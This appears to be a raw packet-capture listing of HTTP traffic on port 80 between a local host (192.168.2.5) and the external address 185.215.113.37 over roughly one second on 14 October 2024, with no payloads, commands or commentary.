Oct 14, 2024 01:53:18.920548916 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:18.920595884 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:18.921044111 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:18.921058893 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:18.921073914 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:18.921075106 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:18.921088934 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:18.921108007 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:18.921139002 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:18.921391964 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:18.921407938 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:18.921422005 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:18.921442032 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:18.921458960 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.053034067 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.053051949 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.053097010 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.053142071 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.053493977 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.053509951 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.053530931 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.053580046 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.053580046 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.053580046 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.053634882 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.053683043 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.053709030 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.053724051 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.053738117 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.053752899 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.053765059 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.053776026 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.054285049 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.054301023 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.054315090 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.054337025 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.054362059 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.054431915 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.054456949 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.054469109 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.054477930 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.054497004 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.054514885 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.055332899 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.055349112 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.055362940 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.055382967 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.055413961 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.055413961 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.055568933 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.055583954 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.055598021 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.055623055 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.055639982 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.055975914 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.055989981 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.056005001 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.056031942 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.056047916 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.056047916 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.056173086 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.056222916 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.056225061 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.056257963 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.056271076 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.056272030 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.056284904 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.056297064 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.056318045 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.056327105 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.056885004 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.056901932 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.056915998 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.056938887 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.056955099 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.143485069 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.143500090 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.143563986 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.187254906 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.187280893 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.187294006 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.187359095 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.187463999 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.187726021 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.187767982 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.187791109 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.187817097 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.187851906 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.187906981 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.187946081 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.187984943 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.188008070 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.188034058 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.188060999 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.188110113 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.188199043 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.188235998 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.188260078 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.188281059 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.188307047 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.188361883 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.188750029 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.188785076 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.188827038 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.188827038 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.188893080 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.188946962 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.189246893 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.189308882 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.189385891 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.189415932 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.189441919 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.189461946 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.189493895 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.189531088 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.189553022 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.189580917 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.189600945 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.189651966 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.190980911 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.191045046 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.191061974 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.191097975 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.191116095 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.191158056 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.191179991 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.191204071 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.191268921 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.191304922 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.191327095 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.191349983 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.191420078 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.191468954 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.191495895 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.191531897 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.191551924 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.191577911 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.191606045 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.191641092 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.191663027 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.191694021 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.191714048 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.191747904 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.191770077 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.191792965 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.191823959 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.191858053 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.191879034 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.191914082 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.191932917 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.191983938 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.191998959 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.192025900 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.192049026 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.192082882 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.192104101 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.192138910 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.192161083 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.192190886 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.192214966 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.192250013 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.192292929 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.192292929 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.192327976 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.192362070 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.192383051 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.192415953 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.192436934 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.192471027 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.192492008 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.192523956 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.192543983 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.192574024 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.192594051 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.192620993 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.192646980 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.192682028 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.192704916 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.192732096 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.192754984 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.192787886 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.192811012 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.192835093 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.192886114 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.192977905 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.234162092 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.234208107 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.234266043 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.234312057 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.321022987 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.321063042 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.321098089 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.321156025 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.321187019 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.321233034 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.321264029 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.321286917 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.321321011 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.321343899 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.321368933 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.321806908 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.321841955 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.321867943 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.321888924 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.321921110 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.321957111 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.321980000 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.322007895 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.322357893 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.322422981 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.322438955 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.322477102 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.322491884 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.322532892 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.322549105 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.322586060 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.322735071 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.322793961 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.322827101 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.322879076 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.322901964 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.322957039 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.322984934 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.323044062 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.323059082 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.323100090 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.323129892 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.323189974 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.323204041 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.323240042 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.323256969 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.323318005 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.323332071 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.323374033 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.323407888 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.323431969 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.323476076 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.323510885 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.323533058 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.323559999 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.323585033 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.323647976 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.323662996 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.323704004 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.323734999 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.323790073 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.323812962 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.323875904 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.323919058 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.323973894 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.323995113 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.324048996 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.324069977 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.324126005 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.324150085 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.324173927 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.324222088 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.324275017 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.324311018 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.324331999 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.324353933 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.324388981 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.324412107 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.324436903 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.324482918 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.324534893 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.324556112 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.324585915 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.324609041 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.324634075 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.324662924 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.324697971 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.324722052 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.324745893 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.324774027 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.324809074 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.324831963 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.324867010 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.324892998 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.324945927 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.324966908 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.325001955 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.325023890 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.325056076 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.325081110 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.325110912 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.325143099 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.325164080 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.325195074 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.325228930 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.325252056 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.325275898 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.325305939 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.325340986 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.325364113 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.325395107 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.325414896 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.325449944 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.325470924 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.325498104 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.325525045 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.325558901 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.325578928 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.325612068 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.325629950 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.325664997 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.325685978 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.325716972 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.325737953 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.325773001 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.325798035 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.325815916 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.325848103 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.325881004 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.325903893 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.325934887 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.325957060 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.325993061 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.326014996 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.326037884 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.326066971 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.326106071 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.326126099 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.326159954 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.326178074 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.326210976 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.326234102 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.326256990 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.326284885 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.326320887 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:19.326343060 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.326368093 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:19.326391935 CEST	80	49705	185.215.113.37	192.168.2.5
